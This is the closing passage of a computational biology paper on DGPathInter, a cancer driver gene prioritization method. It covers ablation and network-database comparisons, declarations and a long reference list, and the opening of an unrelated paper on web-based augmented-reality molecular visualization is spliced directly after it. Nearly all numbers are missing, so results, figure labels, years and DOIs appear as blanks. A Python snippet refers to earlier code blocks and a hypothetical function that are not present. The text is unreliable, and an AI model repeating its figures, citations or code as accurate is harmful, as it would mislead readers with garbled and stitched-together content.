the performance of our method, we calculate the results with only the network information, the results with only the pathway information and the results with no prior information (i.e., plain matrix factorization) by removing the two terms of pathway information, the term of network regularization and all three terms of prior information, respectively. through the evaluation results in figs. s and s , we can see that the results with prior information from both network and pathways achieve better performance than the results with only network information, the results with only pathway information, and the results with no prior information. these comparison results indicate that the detection results of our method are contributed by the prior knowledge coming from networks and pathways.
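the ablation described above amounts to zeroing the corresponding tuning parameters; a minimal sketch, reusing the hypothetical dgpathinter_layers function and the X, F and L arrays from the earlier code blocks, and with placeholder parameter values, is shown below.

```python
# placeholder parameter values; the paper's empirical settings are not reproduced here
lam_c, lam_l, lam_v = 0.1, 0.1, 0.1

settings = {
    "full model":          dict(lam_c=lam_c, lam_l=lam_l, lam_v=lam_v),
    "network only":        dict(lam_c=0.0,   lam_l=lam_l, lam_v=lam_v),  # pathway terms removed
    "pathway only":        dict(lam_c=lam_c, lam_l=0.0,   lam_v=lam_v),  # network term removed
    "no prior (plain mf)": dict(lam_c=0.0,   lam_l=0.0,   lam_v=lam_v),  # all prior terms removed
}
results = {name: dgpathinter_layers(X, F, L, **kw) for name, kw in settings.items()}
```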
note that the previous network-based methods can incorporate pathway information when they use a network that contains interaction data derived from pathway databases, such as the public molecular interaction database string. in comparison, irefindex is an interaction database that only assembles data from other primary interaction databases, and does not provide the coverage of pathway interactions that is offered by string. therefore, we compare our method against the previous network-based approaches by using string instead of irefindex. the comparison results with string are evaluated by precision–recall curves (fig. s for cgc and s for ncg), the average ranks of known cancer genes (table s for cgc and ncg) and the proportions of known cancer genes in the top genes with p values of fisher’s exact test (fig. s for cgc and ncg). we observe that the performance of hotnet and muffinn-dnsum with string is improved when compared with their performance with irefindex. this phenomenon may be due to the fact that irefindex does not provide the coverage of pathway interactions that is offered by string. for dgpathinter, the detection results still outperform those of the other network-based methods when string is used. when we further apply the statistical validation on the detection results of these competing methods with string, the validation results of the friedman test demonstrate that the difference between the detection results of the investigated methods is statistically significant (details in supplemental information). consequently, our approach provides an added value over previous network-based approaches through the use of information on pathway boundaries, which is not explicitly included in string. despite the achievement, there are also some questions for further investigation. since there seems to be a bias among network-based driver gene identification methods where hot nodes and their neighbors are always identified as candidate drivers, we further investigate how many of the top dgpathinter-output genes are neighbors of tp . for brca, gbm and thca, the numbers of the top genes detected by dgpathinter that are also neighbors of tp are , and , respectively, which is much less than (the number of neighbors of tp in irefindex). accordingly, it seems that the results of dgpathinter are less affected by the bias among network-based driver gene identification methods. furthermore, there is a possibility that some genes may contain both driver and passenger mutations, and this problem is not addressed in the experimental design of our work. the current approach focuses on gene-level predictions, and it cannot yet make predictions at the level of individual mutations. in fig. s , using network information does not change the performance for the datasets of the three types of cancers. when we further investigate this phenomenon, we find that some non-benchmarking genes included in the top ranked genes in the result with network information are different from those in the result with no prior information, although the known benchmarking genes included in the two results are the same. in addition, a possible expansion of dgpathinter would be to integrate multi-omic data from not only mutations but also copy number alteration, gene expression and dna methylation of genes, which also play important roles in activating oncogenes and inactivating tumor suppressors (yang et al., ).
important roles in activating oncogenes and inactivating tumor suppressors (yang et al., ). another interesting topic for future work is to generalize the framework of dgpathinter to pan-cancer analysis, in which the samples of numerous different cancer types are combined into one large dataset and driver genes shared across many types of cancers can be identified (leiserson et al., ). in conclusion, dgpathinter is an efficient method for prioritizing driver genes, and yields a sophisticated perspective of the cancer genome by utilizing prior knowledge from the interactome and pathways. acknowledgements we would like to thank changran zhang and the anonymous reviewers for insight and help with revisions of this manuscript. additional information and declarations funding this work was supported by the national natural science foundation of china (nos. , and ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national natural science foundation of china: , and . competing interests the authors declare that they have no competing interests. author contributions jianing xi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work and reviewed drafts of the paper. minghui wang conceived and designed the experiments, analyzed the data and reviewed drafts of the paper. ao li wrote the paper and reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/ustc-hilab/dgpathinter supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references an o, pendino v, d'antonio m, ratti e, gentilini m, ciccarelli fd. . ncg . : the network of cancer genes in the era of massive mutational screenings of cancer genomes. database : bau doi . /database/bau . bashashati a, haffari g, ding j, ha g, lui k, rosner j, huntsman dg, caldas c, aparicio sa, shah sp. . drivernet: uncovering the impact of somatic driver mutations on transcriptional networks in cancer. genome biology ( ):r doi . /gb- - - -r . bertrand d, chng kr, sherbaf fg, kiesel a, chia bkh, sia yy, huang sk, hoon dsb, liu et, hillmer a, nagarajan n. . patient-specific driver gene prediction and risk assessment through integrated network analysis of cancer omics profiles. nucleic acids research ( ): e –e doi . /nar/gku . cancer genome atlas network. . comprehensive molecular portraits of human breast tumours. nature ( ): – doi . /nature . cancer genome atlas research network. . comprehensive genomic characterization defines human glioblastoma genes and core pathways. nature ( ): doi . /nature . cancer genome atlas research network. .
integrated genomic characterization of papillary thyroid carcinoma. cell ( ): – doi . /j.cell. . . . chen j, zhang s. . integrative analysis for identifying joint modular patterns of gene- expression and drug-response data. bioinformatics ( ): – doi . /bioinformatics/btw . cho a, shim je, kim e, supek f, lehner b, lee i. . muffinn: cancer gene discovery via network analysis of somatic mutation data. genome biology ( ): doi . /s - - -x. chow lm, endersby r, zhu x, rankin s, qu c, zhang j, broniscer a, ellison dw, baker sj. . cooperativity within and among pten, p , and rb pathways induces high-grade astrocytoma in adult brain. cancer cell ( ): – doi . /j.ccr. . . . das j, yu h. . hint: high-quality protein interactomes and their applications in understanding human disease. bmc systems biology ( ): doi . / - - - . dees nd, zhang q, kandoth c, wendl mc, schierding w, koboldt dc, mooney tb, callaway mb, dooling d, mardis er, wilson rk, ding l. . music: identifying mutational significance in cancer genomes. genome research ( ): – doi . /gr. . . futreal pa, coin l, marshall m, down t, hubbard t, wooster r, rahman n, stratton mr. . a census of human cancer genes. nature reviews cancer ( ): – doi . /nrc . gao j, aksoy ba, dogrusoz u, dresdner g, gross b, sumer so, sun y, jacobsen a, sinha r, larsson e, cerami e, sander c, schultz n. . integrative analysis of complex cancer genomics and clinical profiles using the cbioportal. science signaling ( ):pl doi . /scisignal. . gargi u, kasturi r. . image database querying using a multi-scale localized color representation. in proceedings ieee workshop on content-based access of image and video libraries (cbaivl’ ). piscataway: ieee, – . gaynor ku, grigorieva iv, allen md, esapa ct, head ra, gopinath p, christie pt, nesbit ma, jones jl, thakker rv. . gata mutations found in breast cancers may be associated with xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /database/bau http://dx.doi.org/ . /gb- - - -r http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /j.ccr. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /nrc http://dx.doi.org/ . /scisignal. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aberrant nuclear localization, reduced transactivation and cell invasiveness. hormones and cancer ( ): – doi . /s - - -x. hofree m, shen jp, carter h, gross a, ideker t. . network-based stratification of tumor mutations. nature methods ( ): – doi . /nmeth. . hou jp, ma j. . dawnrank: discovering personalized driver genes in cancer. genome medicine ( ): doi . /s - - - . hua x, xu h, yang y, zhu j, liu p, lu y. . drgap: a powerful tool for identifying driver genes and pathways in cancer sequencing studies. american journal of human genetics ( ): – doi . /j.ajhg. . . . 
hudson tj, anderson w, aretz a, barker ad, bell c, bernabé rr, bhan mk, calvo f, eerola i, gerhard ds, guttmacher a, guyer m, hemsley fm, jennings jl, kerr d, klatt p, kolar p, kusada j, lane dp, laplace f, youyong l, nettekoven g, ozenberger b, peterson j, rao ts, remacle j, schafer aj, shibata t, stratton mr, vockley jg, watanabe k, yang h, yuen mm, knoppers bm, bobrow m, cambon-thomsen a, dressler lg, dyke so, joly y, kato k, kennedy kl, nicolás p, parker mj, rial-sebbag e, romeo-casabona cm, shaw km, wallace s, wiesner gl, zeps n, lichter p, biankin av, chabannon c, chin l, clément b, de alava e, degos f, ferguson ml, geary p, hayes dn, hudson tj, johns al, kasprzyk a, nakagawa h, penny r, piris ma, sarin r, scarpa a, shibata t, van de vijver m, futreal pa, aburatani h, bayés m, botwell dd, campbell pj, estivill x, gerhard ds, grimmond sm, gut i, hirst m, lópez-otı́n c, majumder p, marra m, mcpherson jd, nakagawa h, ning z, puente xs, ruan y, shibata t, stratton mr, stunnenberg hg, swerdlow h, velculescu ve, wilson rk, xue hh, yang l, spellman pt, bader gd, boutros pc, campbell pj, flicek p, getz g, guigó r, guo g, haussler d, heath s, hubbard tj, jiang t, jones sm, li q, lópez-bigas n, luo r, muthuswamy l, ouellette bf, pearson jv, puente xs, quesada v, raphael bj, sander c, shibata t, speed tp, stein ld, stuart jm, teague jw, totoki y, tsunoda t, valencia a, wheeler da, wu h, zhao s, zhou g, stein ld, guigó r, hubbard tj, joly y, jones sm, kasprzyk a, lathrop m, lópez-bigas n, ouellette bf, spellman pt, teague jw, thomas g, valencia a, yoshida t, kennedy kl, axton m, dyke so, futreal pa, gerhard ds, gunter c, guyer m, hudson tj, mcpherson jd, miller lj, ozenberger b, shaw km, kasprzyk a, stein ld, zhang j, haider sa, wang j, yung ck, cros a, liang y, gnaneshan s, guberman j, hsu j, bobrow m, chalmers dr, hasel kw, joly y, kaan ts, kennedy kl, knoppers bm, lowrance ww, masui t, nicolás p, rial-sebbag e, rodriguez ll, vergely c, yoshida t, grimmond sm, biankin av, bowtell dd, cloonan n, defazio a, eshleman jr, etemadmoghadam d, gardiner bb, kench jg, scarpa a, sutherland rl, tempero ma, waddell nj, wilson pj, mcpherson jd, gallinger s, tsao ms, shaw pa, petersen gm, mukhopadhyay d, chin l, depinho ra, thayer s, muthuswamy l, shazand k, beck t, sam m, timms l, ballin v, lu y, ji j, zhang x, chen f, hu x, zhou g, yang q, tian g, zhang l, xing x, li x, zhu z, yu y, yu j, yang h, lathrop m, tost j, brennan p, holcatova i, zaridze d, brazma a, egevard l, prokhortchouk e, banks re, uhlén m, cambon-thomsen a, viksna j, ponten f, skryabin k, stratton mr, futreal pa, birney e, borg a, børresen-dale al, caldas c, foekens ja, martin s, reis-filho js, richardson al, sotiriou c, stunnenberg hg, thoms g, van de vijver m, van’t veer l, calvo f, birnbaum d, blanche h, boucher p, boyault s, chabannon c, gut i, masson-jacquemier jd, lathrop m, pauporté i, pivot x, vincent-salomon a, tabone e, theillet c, thomas g, tost j, treilleux i, calvo f, bioulac-sage p, clément b, decaens t, degos f, franco d, gut i, gut m, heath s, lathrop m, samuel d, thomas g, zucman-rossi j, lichter p, eils r, brors b, korbel jo, korshunov a, landgraf p, lehrach h, pfister s, radlwimmer b, reifenberger g, taylor md, von kalle c, majumder pp, sarin r, rao ts, bhan mk, scarpa a, pederzoli p, lawlor ra, delledonne m, bardelli a, xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ajhg. . . http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ biankin av, grimmond sm, gress t, klimstra d, zamboni g, shibata t, nakamura y, nakagawa h, kusada j, tsunoda t, miyano s, aburatani h, kato k, fujimoto a, yoshida t, campo e, lópez-otı́n c, estivill x, guigó r, de sanjosé s, piris ma, montserrat e, gonzález- dı́az m, puente xs, jares p, valencia a, himmelbauer h, quesada v, bea s, stratton mr, futreal pa, campbell pj, vincent-salomon a, richardson al, reis-filho js, van de vijver m, thomas g, masson-jacquemier jd, aparicio s, borg a, børresen-dale al, caldas c, foekens ja, stunnenberg hg, van’t veer l, easton df, spellman pt, martin s, barker ad, chin l, collins fs, compton cc, ferguson ml, gerhard ds, getz g, gunter c, guttmacher a, guyer m, hayes dn, lander es, ozenberger b, penny r, peterson j, sander c, shaw km, speed tp, spellman pt, vockley jg, wheeler da, wilson rk, hudson tj, chin l, knoppers bm, lander es, lichter p, stein ld, stratton mr, anderson w, barker ad, bell c, bobrow m, burke w, collins fs, compton cc, depinho ra, easton df, futreal pa, gerhard ds, green ar, guyer m, hamilton sr, hubbard tj, kallioniemi op, kennedy kl, ley tj, liu et, lu y, majumder p, marra m, ozenberger b, peterson j, schafer aj, spellman pt, stunnenberg hg, wainwright bj, wilson rk, yang h. . international network of cancer genome projects. nature ( ): – doi . /nature . jia p, zhao z. . varwalker: personalized mutation network analysis of putative cancer genes from next-generation sequencing data. plos computational biology ( ):e doi . /journal.pcbi. . joshi-tope g, gillespie m, vastrik i, d’eustachio p, schmidt e, de bono b, jassal b, gopinath gr, wu gr, matthews l, lewis s, birney e, stein l. . reactome: a knowledgebase of biological pathways. nucleic acids research (suppl_ ):d –d doi . /nar/gki . kandoth c, mclellan md, vandin f, ye k, niu b, lu c, xie m, zhang q, mcmichael jf, wyczalkowski ma, leiserson mdm, miller ca, welch js, walter mj, wendl mc, ley tj, wilson rk, raphael bj, ding l. . mutational landscape and significance across major cancer types. nature ( ): – doi . /nature . khurana e, fu y, chen j, gerstein m. . interpretation of genomic variants using a unified biological network approach. plos computational biology ( ):e doi . /journal.pcbi. . kim s, sael l, yu h. . a mutation profile for top-k patient search exploiting gene-ontology and orthogonal non-negative matrix factorization. bioinformatics ( ): – doi . /bioinformatics/btv . lawrence ms, stojanov p, mermel ch, garraway la, golub tr, meyerson m, gabriel sb, lander es, getz g. . discovery and saturation analysis of cancer genes across tumor types. nature ( ): – doi . /nature . lawrence ms, stojanov p, polak p, kryukov gv, cibulskis k, sivachenko a, carter sl, stewart c, mermel ch, roberts sa, kiezun a, hammerman ps, mckenna a, drier y, zou l, ramos ah, pugh tj, stransky n, helman e, kim j, sougnez c, ambrogio l, nickerson e, shefler e, cortés ml, auclair d, saksena g, voet d, noble m, dicara d, lin p, lichtenstein l, heiman di, fennell t, imielinski m, hernandez b, hodis e, baca s, dulak am, lohr j, landau da, wu cj, melendez-zajgla j, hidalgo-miranda a, koren a, mccarroll sa, mora j, crompton b, onofrio r, parkin m, winckler w, ardlie k, gabriel sb, roberts cwm, biegel ja, stegmaier k, bass aj, garraway la, meyerson m, golub tr, gordenin da, sunyaev s, lander es, getz g. . mutational heterogeneity in cancer and the search for new cancer-associated genes. nature ( ): – doi . /nature . xi et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / http://dx.doi.org/ . /nature http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . /nature http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /nature http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee i, blom um, wang pi, shim je, marcotte em. . prioritizing candidate disease genes by network-based boosting of genome-wide association data. genome research ( ): – doi . /gr. . . lee m, shen h, huang jz, marron js. . biclustering via sparse singular value decomposition. biometrics ( ): – . leiserson md, vandin f, wu h-t, dobson jr, raphael br. . pan-cancer identification of mutated pathways and protein complexes. cancer research ( supplement): – doi . / - .am - . li f, gao l, ma x, yang x. . detection of driver pathways using mutated gene network in cancer. molecular biosystems ( ): – doi . /c mb c. ma w-y, zhang hj. . benchmarking of image features for content-based retrieval. in conference record of the thirty-second asilomar conference on signals, systems & computers, , pacific grove, usa. vol. . ieee, – . ma x, tang w, wang p, guo x, gao l. . extracting stage-specific and dynamic modules through analyzing multiple networks associated with cancer progression. ieee/acm transactions on computational biology and bioinformatics. piscataway & new york: ieee/acm. malioutov d, malyutov m. . boolean compressed sensing: lp relaxation for group testing. in ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . müller h, müller w, squire dm, marchand-maillet s, pun t. . performance evaluation in content-based image retrieval: overview and proposals. pattern recognition letters ( ): – doi . /s - ( ) - . ng s, collisson ea, sokolov a, goldstein t, gonzalez-perez a, lopez-bigas n, benz c, haussler d, stuart jm. . paradigm-shift predicts the function of mutations in multiple cancers using pathway impact analysis. bioinformatics ( ):i –i doi . /bioinformatics/bts . nishimura d. . biocarta. biotech software & internet report ( ): – doi . / . ogata h, goto s, sato k, fujibuchi w, bono h, kanehisa m. . kegg: kyoto encyclopedia of genes and genomes. nucleic acids research ( ): – doi . /nar/ . . . pan r, zhou y, cao b, liu nn, lukose r, scholz m, yang q. . one-class collaborative filtering. in eighth ieee international conference on data mining, . icdm’ , pisa, italy. ieee, – . park s, kim s-j, yu d, pena-llopis s, gao j, park js, chen b, norris j, wang x, chen m, kim m, yong j, wardak z, choe ks, story m, starr tk, cheong j-h, hwang th. . an integrative somatic mutation analysis to identify pathways linked with survival outcomes across cancer types. bioinformatics ( ): – doi . /bioinformatics/btv . parsons dw, jones s, zhang x, lin jc-h, leary rj, angenendt p, mankoo p, carter h, siu i-m, gallia gl. . an integrated genomic analysis of human glioblastoma multiforme. science ( ): – . prasad tsk, goel r, kandasamy k, keerthikumar s, kumar s, mathivanan s, telikicherla d, raju r, shafreen b, venugopal a, balakrishnan l, marimuthu a, banerjee s, somanathan ds, sebastian a, rani s, ray s, harrys kishore cj, kanth s, ahmed m, kashyap mk, mohmood r, ramachandra yl, krishna v, abdul rahiman b, mohan s, ranganathan p, ramabadran s, chaerkady r, pandey a. . human protein reference database- update. nucleic acids research (suppl ):d –d doi . /nar/gkn . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gr. 
. http://dx.doi.org/ . / - .am - http://dx.doi.org/ . /c mb c http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . / http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ raphael bj, dobson jr, oesper l, vandin f. . identifying driver mutations in sequenced cancer genomes: computational approaches to enable precision medicine. genome medicine ( ): doi . /gm . razick s, magklaras g, donaldson im. . irefindex: a consolidated protein interaction database with provenance. bmc bioinformatics ( ): doi . / - - - . schuster sc. . next-generation sequencing transforms today’s biology. nature ( ): – doi . /nmeth . sherr cj, mccormick f. . the rb and p pathways in cancer. cancer cell ( ): – . shi k, gao l, wang b. . discovering potential cancer driver genes by an integrated network-based approach. molecular biosystems ( ): – doi . /c mb a. sill m, kaiser s, benner a, kopp-schneider a. . robust biclustering by sparse singular value decomposition incorporating stability selection. bioinformatics ( ): – . sjöblom t, jones s, wood ld, parsons dw, lin j, barber td, mandelker d, leary rj, ptak j, silliman n, szabo s, buckhaults p, farrell c, meeh p, markowitz sd, willis j, dawson d, willson jk, gazdar af, hartigan j, wu l, liu c, parmigiani g, park bh, bachman ke, papadopoulos n, vogelstein b, kinzler kw, velculescu ve. . the consensus coding sequences of human breast and colorectal cancers. science ( ): – . subramanian a, tamayo p, mootha vk, mukherjee s, ebert bl, gillette ma, paulovich a, pomeroy sl, golub tr, lander es, mesirov jp. . gene set enrichment analysis: a knowledge-based approach for interpreting genome-wide expression profiles. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . szklarczyk d, franceschini a, kuhn m, simonovic m, roth a, minguez p, doerks t, stark m, muller j, bork p, jensen lj, von mering c. . the string database in : functional interaction networks of proteins, globally integrated and scored. nucleic acids research (suppl ):d –d doi . /nar/gkq . tamborero d, gonzalez-perez a, perez-llamas c, deu-pons j, kandoth c, reimand j, lawrence ms, getz g, bader gd, ding l, lopez-bigas n. . comprehensive identification of mutational cancer driver genes across tumor types. scientific reports : doi . /srep . tu m, li z, liu x, lv n, xi c, lu z, wei j, song g, chen j, guo f, jiang k, wang s, gao w, miao y. . vasohibin promotes epithelial-mesenchymal transition in human breast cancer via activation of transforming growth factor b and hypoxia dependent repression of gata-binding factor . cancer letters : – doi . /j.canlet. . . . usary j, llaca v, karaca g, presswala s, karaca m, he x, langerød a, kåresen r, oh ds, dressler lg, lønning pe, strausberg rl, chanock s, børresen-dale al, perou cm. . mutation of gata in human breast tumors. oncogene ( ): doi . /sj.onc. . vandin f, upfal e, raphael bj. . algorithms for detecting significantly mutated pathways in cancer. journal of computational biology ( ): – doi . /cmb. . . vaske cj, benz sc, sanborn jz, earl d, szeto c, zhu j, haussler d, stuart jm. . inference of patient-specific pathway activities from multi-dimensional cancer genomics data using paradigm. bioinformatics ( ):i –i doi . /bioinformatics/btq . vogelstein b, papadopoulos n, velculescu ve, zhou s, diaz la, kinzler kw. . cancer genome landscapes. science ( ): – doi . /science. . 
weinstein jn, collisson ea, mills gb, shaw krm, ozenberger ba, ellrott k, shmulevich i, sander c, stuart jm, cancer genome atlas research network, chang k, creighton cj, xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gm http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nmeth http://dx.doi.org/ . /c mb a http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /srep http://dx.doi.org/ . /j.canlet. . . http://dx.doi.org/ . /sj.onc. http://dx.doi.org/ . /cmb. . http://dx.doi.org/ . /bioinformatics/btq http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ davis c, donehower l, drummond j, wheeler d, ally a, balasundaram m, birol i, butterfield sn, chu a, chuah e, chun hj, dhalla n, guin r, hirst m, hirst c, holt ra, jones sj, lee d, li hi, marra ma, mayo m, moore ra, mungall aj, robertson ag, schein je, sipahimalani p, tam a, thiessen n, varhol rj, beroukhim r, bhatt as, brooks an, cherniack ad, freeman ss, gabriel sb, helman e, jung j, meyerson m, ojesina ai, pedamallu cs, saksena g, schumacher se, tabak b, zack t, lander es, bristow ca, hadjipanayis a, haseley p, kucherlapati r, lee s, lee e, luquette lj, mahadeshwar hs, pantazi a, parfenov m, park pj, protopopov a, ren x, santoso n, seidman j, seth s, song x, tang j, xi r, xu aw, yang l, zeng d, auman jt, balu s, buda e, fan c, hoadley ka, jones cd, meng s, mieczkowski pa, parker js, perou cm, roach j, shi y, silva go, tan d, veluvolu u, waring s, wilkerson md, wu j, zhao w, bodenheimer t, hayes dn, hoyle ap, jeffreys sr, mose le, simons jv, soloway mg, baylin sb, berman bp, bootwalla ms, danilova l, herman jg, hinoue t, laird pw, rhie sk, shen h, triche t jr, weisenberger dj, carter sl, cibulskis k, chin l, zhang j, getz g, sougnez c, wang m, saksena g, carter sl, cibulskis k, chin l, zhang j, getz g, dinh h, doddapaneni hv, gibbs r, gunaratne p, han y, kalra d, kovar c, lewis l, morgan m, morton d, muzny d, reid j, xi l, cho j, dicara d, frazer s, gehlenborg n, heiman di, kim j, lawrence ms, lin p, liu y, noble ms, stojanov p, voet d, zhang h, zou l, stewart c, bernard b, bressler r, eakin a, iype l, knijnenburg t, kramer r, kreisberg r, leinonen k, lin j, liu y, miller m, reynolds sm, rovira h, shmulevich i, thorsson v, yang d, zhang w, amin s, wu cj, wu cc, akbani r, aldape k, baggerly ka, broom b, casasent td, cleland j, creighton c, dodda d, edgerton m, han l, herbrich sm, ju z, kim h, lerner s, li j, liang h, liu w, lorenzi pl, lu y, melott j, mills gb, nguyen l, su x, verhaak r, wang w, weinstein jn, wong a, yang y, yao j, yao r, yoshihara k, yuan y, yung ak, zhang n, zheng s, ryan m, kane dw, aksoy ba, ciriello g, dresdner g, gao j, gross b, jacobsen a, kahles a, ladanyi m, lee w, lehmann kv, miller ml, ramirez r, rätsch g, reva b, sander c, schultz n, senbabaoglu y, shen r, sinha r, sumer so, sun y, taylor bs, weinhold n, fei s, spellman p, benz c, carlin d, cline m, craft b, ellrott k, goldman m, haussler d, ma s, ng s, paull e, radenbaugh a, salama s, sokolov a, stuart jm, swatloski t, uzunangelov v, waltman p, yau c, zhu j, hamilton sr, getz g, sougnez c, abbott s, abbott r, dees nd, delehaunty k, ding l, dooling dj, eldred jm, fronick cc, fulton r, fulton ll, kalicki-veizer j, kanchi kl, kandoth c, koboldt dc, larson de, ley tj, lin l, lu c, magrini vj, mardis er, mclellan md, mcmichael jf, miller ca, o’laughlin m, pohl c, schmidt h, smith sm, walker j, wallis jw, wendl mc, wilson rk, wylie t, zhang q, burton r, jensen ma, kahn a, 
pihl t, pot d, wan y, levine da, black ad, bowen j, frick j, gastier-foster jm, harper ha, helsel c, leraas km, lichtenberg tm, mcallister c, ramirez nc, sharpe s, wise l, zmuda e, chanock sj, davidsen t, demchok ja, eley g, felau i, ozenberger ba, sheth m, sofia h, staudt l, tarnuzzer r, wang z, yang l, zhang j, omberg l, margolin a, raphael bj, vandin f, wu ht, leiserson md, benz sc, vaske cj, noushmehr h, knijnenburg t, wolf d, van’t veer l, collisson ea, anastassiou d, ou yang th, lopez-bigas n, gonzalez-perez a, tamborero d, xia z, li w, cho dy, przytycka t, hamilton m, mcguire s, nelander s, johansson p, jörnsten r, kling t, sanchez j. . the cancer genome atlas pan-cancer analysis project. nature genetics ( ): – doi . /ng. . wu h-t, hajirasouliha i, raphael bj. . detecting independent and recurrent copy number aberrations using interval graphs. bioinformatics ( ):i –i doi . /bioinformatics/btu . xi j, li a. . discovering recurrent copy number aberrations in complex patterns via non-negative sparse singular value decomposition. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . xi j, li a, wang m. . a novel network regularized matrix decomposition method to detect mutated cancer genes in tumour samples with inter-patient heterogeneity. scientific reports ( ): doi . /s - - -w. xie b, wang m, tao d. . toward the optimization of normalized graph laplacian. ieee transactions on neural networks ( ): – doi . /tnn. . . xiong m, zhao z, arnold j, yu f. . next-generation sequencing. journal of biomedicine and biotechnology : doi . / / . yang h, wei q, zhong x, yang h, li b. . cancer driver gene discovery through an integrative genomics approach in a non-parametric bayesian framework. bioinformatics ( ): – . youn a, simon r. . identifying cancer driver genes in tumor genome sequencing studies. bioinformatics ( ): – doi . /bioinformatics/btq . zhao m, wang q, wang q, jia p, zhao z. . computational tools for copy number variation (cnv) detection using next-generation sequencing data: features and perspectives. bmc bioinformatics ( ): doi . / - - -s -s . zhou x, liu j, wan x, yu w. . piecewise-constant and low-rank approximation for identification of recurrent copy number variations. bioinformatics ( ): – doi . /bioinformatics/btu . zhou x, yang c, wan x, zhao h, yu w. . multisample acgh data analysis via total variation and spectral regularization. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . .
building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers luciano a.
abriata , École polytechnique fédérale de lausanne, lausanne, switzerland swiss institute of bioinformatics, lausanne, switzerland abstract for years, immersive interfaces using virtual and augmented reality (ar) for molecular visualization and modeling have promised a revolution in the way how we teach, learn, communicate and work in chemistry, structural biology and related areas. however, most tools available today for immersive modeling require specialized hardware and software, and are costly and cumbersome to set up. these limitations prevent wide use of immersive technologies in education and research centers in a standardized form, which in turn prevents large-scale testing of the actual effects of such technologies on learning and thinking processes. here, i discuss building blocks for creating marker-based ar applications that run as web pages on regular computers, and explore how they can be exploited to develop web content for handling virtual molecular systems in commodity ar with no more than a webcam- and internet-enabled computer. examples span from displaying molecules, electron microscopy maps and molecular orbitals with minimal amounts of html code, to incorporation of molecular mechanics, real-time estimation of experimental observables and other interactive resources using javascript. these web apps provide virtual alternatives to physical, plastic-made molecular modeling kits, where the computer augments the experience with information about spatial interactions, reactivity, energetics, etc. the ideas and prototypes introduced here should serve as starting points for building active content that everybody can utilize online at minimal cost, providing novel interactive pedagogic material in such an open way that it could enable mass-testing of the effect of immersive technologies on chemistry education. subjects bioinformatics, computational biology, human-computer interaction, multimedia keywords molecular modeling, integrative modeling, virtual reality, augmented reality, chemistry, education, molecular visualization introduction for a long time it has been suggested that visual immersive analytics based in virtual reality (vr), augmented reality (ar) and other advanced forms of human-computer interactions have enormous potential in assisting thinking processes in scientific research and in education, especially in areas of science that deal with abstract objects, objects much smaller or larger than human dimensions, objects that are hard to acquire and handle due to high costs, scarcity or fragility, and very large amounts of data (o’donoghue et al., ; matthews, ; krichenbauer et al., ; sommer et al., ). chemistry and how to cite this article abriata la. . building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted january published february corresponding author luciano a. abriata, luciano.abriata@epfl.ch academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright abriata distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:luciano.�abriata@�epfl.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . 
/ https://peerj.com/computer-science/ structural biology are examples of such disciplines where ar and vr have been attributed high potential in education and research, by providing hybrid physical/computational interfaces to handle and explore virtual molecules in real d space augmented with real-time overlay of information from databases and calculations. however, the actual impact of immersive technologies on teaching, learning and working in chemistry still requires deep evaluation (fjeld & voegtli, ; pence, williams & belford, ; matthews, ; bach et al., ; yang, mei & yue, ). such evaluation has progressed very slowly due to the complex software setups and the specialized hardware needed, which limit availability, reach, adoption, and thus testing. indeed this limitation is shared more broadly with other potential applications of ar and vr in science, which so far “[…] remain niche tools for scientific research” (matthews, ). in the last decade several groups have been studying ways to achieve immersive environments for chemistry and structural biology using vr and ar (gillet et al., , ; maier, tönnis & gudrunklinker, ; maier & klinker, ; hirst, glowacki & baaden, ; berry & board, ; martínez-hung, garcía-lópez & escalona-arranz, ; vega garzón, magrini & galembeck, ; balo, wang & ernst, ; goddard et al., a, b; wolle, müller & rauh, ; o’connor et al., ; ratamero et al., ; müller et al., ; stone, ). such 